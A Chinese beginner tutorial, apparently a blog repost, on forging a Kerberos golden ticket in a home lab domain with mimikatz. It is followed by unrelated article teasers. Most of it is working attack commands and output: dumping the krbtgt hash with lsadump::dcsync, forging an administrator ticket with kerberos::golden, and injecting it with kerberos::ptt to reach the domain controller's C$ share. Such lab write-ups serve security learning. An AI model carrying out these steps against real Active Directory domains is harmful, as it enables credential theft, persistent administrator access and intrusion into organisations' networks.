黄金票据制作-新手向

news2024/11/26 2:44:14

黄金票据制作

文章目录

  • 黄金票据制作
    • 0x01 前言
    • 0x02 黄金票据的制作
      • 一、靶场搭建
      • 二、收集制作信息
        • 获取域名称
        • 获取域SID值
        • 获取域用户krbtgt密码hash值
      • 二、制作票据
    • 0x03 验证票据有效性

0x01 前言

最近,我学习了内网渗透的相关知识,其中包括了黄金票据的应用。黄金票据涉及的原理和攻击方法构成了一系列复杂的概念,晦涩难懂。简而言之,黄金票据在内网渗透中主要用于权限维持,即留下后门。使用黄金票据前提是你已经控制了整个域的域控制器。其核心原理与服务器中的krbtgt用户相关。
在这里插入图片描述
如果想深入理解黄金票据的工作原理,需要进一步研究Kerberos协议。这里我推荐阅读以下博客来扩展知识:

https://daiker.gitbook.io/windows-protocol/

0x02 黄金票据的制作

一、靶场搭建

我搭建了三台虚拟机,操作系统分别为Windows Server 2016、Windows 10和Windows 7。Windows Server 2016担任域控制器的角色,而Windows 10和Windows 7则作为域成员机。在域中,我创建了三个用户:demo1、demo2和demo3。

如果你不熟悉如何搭建域环境,可以寻找现有的训练靶场,或者通过百度查询相关的搭建教程。

二、收集制作信息

制作黄金票据需要知道域名称、域的SID值、域用户krbtgt的密码hash值、任意用户名,现在假设我们拿到了域管理员的权限,下面完成一下信息收集:

获取域名称

systeminfo 、net user /domain 或者 ipconfig /all 都可以任选其一
在这里插入图片描述

获取域SID值

whoami /all 或者 whoami /user

C:\Users\demo1\Desktop\mimikatz_trunk\x64>whoami /user

用户信息
----------------

用户名       SID
============ ============================================
peihua\demo1 S-1-5-21-1100783840-19582525-4266664591-500

最后面的500是权限数字,不是sid所以需要的值如下:
SID:S-1-5-21-1100783840-19582525-4266664591

获取域用户krbtgt密码hash值

这里的hash值我使用了mimiikztz这样的工具进行获取,使用管理员权限运行cmd执行它
1.先执行privilege::debug进行权限提升
2.然后执行lsadump::dcsync /user:krbtgt /csv,返回结果如下:

mimikatz # lsadump::dcsync /user:krbtgt /csv
[DC] 'peihua.local' will be the domain
[DC] 'WIN-3TBP83C14B9.peihua.local' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502     krbtgt  4d9ccdf4cd700017b5e6537ed6d59dc6  
514

4d9ccdf4cd700017b5e6537ed6d59dc6就是我们要的hash值

二、制作票据

如果已经准备好了所需信息,下马就可以使用mimikatz的kerberos::golden模块来创建黄金票据了,该票据的格式为.kirbi。下面我们来尝试进行制作:
kerberos::golden /domain:peihua.local /sid:S-1-5-21-1100783840-19582525-4266664591 /krbtgt:4d9ccdf4cd700017b5e6537ed6d59dc6 /user:administrator

mimikatz # kerberos::golden /domain:peihua.local /sid:S-1-5-21-1100783840-19582525-4266664591 /krbtgt:4d9ccdf4cd700017b5e6537ed6d59dc6 /user:administrator
User      : administrator
Domain    : peihua.local (PEIHUA)
SID       : S-1-5-21-1100783840-19582525-4266664591
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 4d9ccdf4cd700017b5e6537ed6d59dc6 - rc4_hmac_nt
Lifetime  : 2024/3/31 16:04:20 ; 2034/3/29 16:04:20 ; 2034/3/29 16:04:20
-> Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

查看下当前目录发现票据已经制作完成了
在这里插入图片描述

0x03 验证票据有效性

首先我们先登录一个域的普通账户,然后尝试通过dir访问域控的共享文件夹

C:\Users\demo1\Desktop\mimikatz_trunk\x64>dir \\WIN-3TBP83C14B9.peihua.local\c$
拒绝访问。

发现我们没有足够的权限去访问,下面我们使用mimikatz将创建好的票据文件导入,然后尝试重新访问
kerberos::purge #清空已有票据
kerberos::ptt xxx.kiribi #导入票据
kerberos::list #查看票据

C:\Users\demo1\Desktop\mimikatz_trunk\x64>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # kerberos::ptt C:\Users\demo1\Desktop\mimikatz_trunk\x64\ticket.kirbi

* File: 'C:\Users\demo1\Desktop\mimikatz_trunk\x64\ticket.kirbi': OK

mimikatz # exit
Bye!

C:\Users\demo1\Desktop\mimikatz_trunk\x64>dir \\WIN-3TBP83C14B9.peihua.local\c$
 驱动器 \\WIN-3TBP83C14B9.peihua.local\c$ 中的卷没有标签。
 卷的序列号是 B4D7-21A5

 \\WIN-3TBP83C14B9.peihua.local\c$ 的目录

2016/07/16  21:23    <DIR>          PerfLogs
2016/12/14  19:06    <DIR>          Program Files
2016/07/16  21:23    <DIR>          Program Files (x86)
2024/03/28  21:20    <DIR>          Users
2024/03/28  22:34    <DIR>          Windows
               0 个文件              0 字 节
               5 个目录 51,617,316,864 可 用字节

C:\Users\demo1\Desktop\mimikatz_trunk\x64>

成功访问了域控的共享文件夹,票据有效

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1558972.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

浏览器页面缓存机制

HTTP缓存机制的核心思想是&#xff0c;对于已经请求过的资源&#xff0c;如果其在服务器上没有发生变化&#xff0c;那么浏览器就可以直接从本地缓存中获取这些资源&#xff0c;而无需再次向服务器发送请求。 强缓存 就是确定可用的缓存 浏览器和和服务器对每个缓存资源先商量一…

fread和fwirte函数

✨✨ 欢迎大家来到莉莉的博文✨✨ &#x1f388;&#x1f388;养成好习惯&#xff0c;先赞后看哦~&#x1f388;&#x1f388; 一、fread函数 ——>从文件流中读取二进制数据到ptr指向的数组 从流&#xff08;二进制文件&#xff09;中读取数据块 ptr&#xff1a;指向大小至…

基于JSP在线订花系统

基于JSP在线订花系统的设计与实现 摘要 近年来&#xff0c;随着人们对于生活品质的重视度日益提升&#xff0c;鲜花的需求量也在不断增加同时带动了鲜花电商的飞速发展和应用&#xff0c;平台化的鲜花交易模式也逐渐从传统的鲜花销售转型为个性化鲜花定制。同时随着鲜花速递行…

基于 RisingWave 和 ScyllaDB 构建事件驱动应用

概览 在构建事件驱动应用时&#xff0c;人们面临着两大挑战&#xff1a;1&#xff09;低延迟处理大量数据&#xff1b;2&#xff09;实现流数据的实时摄取和转换。 结合 RisingWave 的流处理功能和 ScyllaDB 的高性能 NoSQL 数据库&#xff0c;可为构建事件驱动应用和数据管道…

MTMT:构建比特币生态平行世界 打造铭文生态繁荣

近年来&#xff0c;随着铭文市场的火爆以及比特币ETF成功通过&#xff0c;比特币生态正经历着一场复兴&#xff0c;尤其是铭文市场作为新一代Web3的叙事&#xff0c;带来了全新的生产方式&#xff0c;可以预见&#xff0c;铭文就像流动性挖矿对于上一轮DeFi Summer的推动一样会…

KNN算法 | K近邻:KD Tree、球树、KNN数据下采样策略

目录 一. KNN算法实现方式1. 蛮力实现(brute)2. KD树(kd_tree)3. 球树(ball_tree) 二. KD Tree算法1. 构建方式2. KD Tree 查找最近邻 三. 球树(Ball Tree)1. 构建方式 四. KNN评价1. 优点2. 缺点 五. 延申1. KNN数据下采样策略策略1策略2策略3策略4 Condensed Nearest Neighbo…

Macs Fan Control Pro--精准掌控Mac风扇,优化散热新选择

Macs Fan Control Pro是一款专为Mac电脑设计的高级风扇控制工具。它具备强大的温度监测能力&#xff0c;可以实时监测Mac电脑各个核心组件的温度&#xff0c;并通过直观的界面展示给用户。同时&#xff0c;用户可以根据个人需求自定义风扇速度&#xff0c;或者选择预设的自动风…

蓝桥杯算法题-图形排版

题目描述 小明需要在一篇文档中加入 N 张图片&#xff0c;其中第 i 张图片的宽度是 Wi&#xff0c;高度是 Hi。   假设纸张的宽度是 M&#xff0c;小明使用的文档编辑工具会用以下方式对图片进行自动排版&#xff1a; 1. 该工具会按照图片顺序&#xff0c;在宽度 M 以内&…

LabVIEW转动设备故障诊断系统

LabVIEW转动设备故障诊断系统 随着工业自动化技术的不断进步&#xff0c;转动设备在电力、化工、船舶等多个行业中扮演着越来越重要的角色。然而&#xff0c;这些设备在长期运行过程中难免会出现故障&#xff0c;如果不能及时诊断和处理&#xff0c;将会导致生产效率下降&…

【JavaSE】一维数组和二维数组详解

欢迎关注个人主页&#xff1a;逸狼 创造不易&#xff0c;可以点点赞吗~ 如有错误&#xff0c;欢迎指出~ 目录 一维数组 基本语法 初始化 遍历和打印 数组是引用型变量 基本类型变量与引用类型变量的区别 null 数组传参和返回 总结 二维数组 基本语法 初始化 遍历和打印 一维数组…

排序——非基于比较的排序

本专栏和大家分享关于排序的算法,其中有插入排&#xff08;直接插入排序和希尔排序&#xff09;、选择排序&#xff08;直接选择排序和堆排&#xff09;、交换排序&#xff08;冒泡排序和快速排序&#xff09;、归并排序以及其他非基于比较的排序 本文与大家分享非基于比较的排…

透视未来安全:PIR技术引领数据隐私新时代

1.隐语实现PIR总体介绍 隐语实现的Private Information Retrieval (PIR) 是一种隐私增强技术&#xff0c;它使用户能够在不暴露他们实际查询内容的情况下从远程服务器数据库中检索所需信息。以下是隐语在实现PIR方面的概要说明和技术特点&#xff1a; 基本概念&#xff1a; PI…

移动硬盘无法读取打不开?原因分析与解决方案

一、移动硬盘遭遇困境&#xff1a;无法读取打不开 在数字信息爆炸的时代&#xff0c;移动硬盘成为了我们储存和传输数据的重要工具。然而&#xff0c;当移动硬盘突然无法读取打不开时&#xff0c;我们往往会感到手足无措。插入电脑后&#xff0c;移动硬盘的指示灯可能正常闪烁…

算法系列--动态规划--特殊的状态表示--分析重复子问题

&#x1f495;"轻舟已过万重山!"&#x1f495; 作者&#xff1a;Lvzi 文章主要内容&#xff1a;算法系列–算法系列–动态规划–特殊的状态表示–分析重复子问题 大家好,今天为大家带来的是算法系列--动态规划--特殊的状态表示--分析重复子问题 一.组合总数IV 链接…

dubbo下

dubbo 集成springboot 配置文件 controller 启动类 注册中心宕机 负载均衡 zookeeper注册中心 dubbo原理 dubbo架构 各层说明 增强spi原理

Native Instruments Kontakt 7 for Mac v7.9.0 专业音频采样

Native Instruments Kontakt 7是一款强大的软件采样器&#xff0c;它允许用户从各种来源采样音频并进行编辑和处理。它包含大量预设采样库&#xff0c;包括乐器、合成器、鼓组和声音效果等。此外&#xff0c;Kontakt 7还允许用户创建自己的采样库&#xff0c;以便根据自己的需要…

2-Prometheus监控主机

1 介绍 Prometheus 使用 node_exporter 服务程序监控 Linux 主机。 2 部署 2.1 下载 官方下载地址 https://prometheus.io/download/ 找到 node-export 下载即可 curl -o node-exporter.tar.gz -L https://github.com/prometheus/node_exporter/releases/download/v1.7.0/…

Linux非root用户安装mysql5.7

1、下载安装包MySQL :: Download MySQL Community Server 点击Archives 我下载的是5.7.27版本&#xff0c;linux主机直接选择linux-Generic即可&#xff0c;选择第一个包下载即可 2、安装mysql 解压 shell> tar xzvf mysql-5.7.31-linux-glibc2.12-x86_64.tar.gz shell&g…

idea中Git项目遇到“Filename too long”错误 与 配置Git的ssh证书

一&#xff1a;“Filename too long”问题解决办法 错误信息&#xff1a; fatal: cannot create directory at xxxx: Filename too long warning: Clone succeeded, but checkout failed. You can inspect what was checked out with git status and retry with git restore …

【Visual Studio】将项目下的文件夹所有文件随编译自动复制输出到运行目录

要将项目根目录下的文件夹内容输出到运行目录&#xff0c;去处理其中的子文件夹和文件&#xff0c;逐个手动设置文件属性或进行复制显然不是一个可行的方法&#xff0c;因为这既繁琐又低效&#xff0c;那有没有更加高效的方式呢 文章目录 选择文件夹修改配置文件输出文件夹 这里…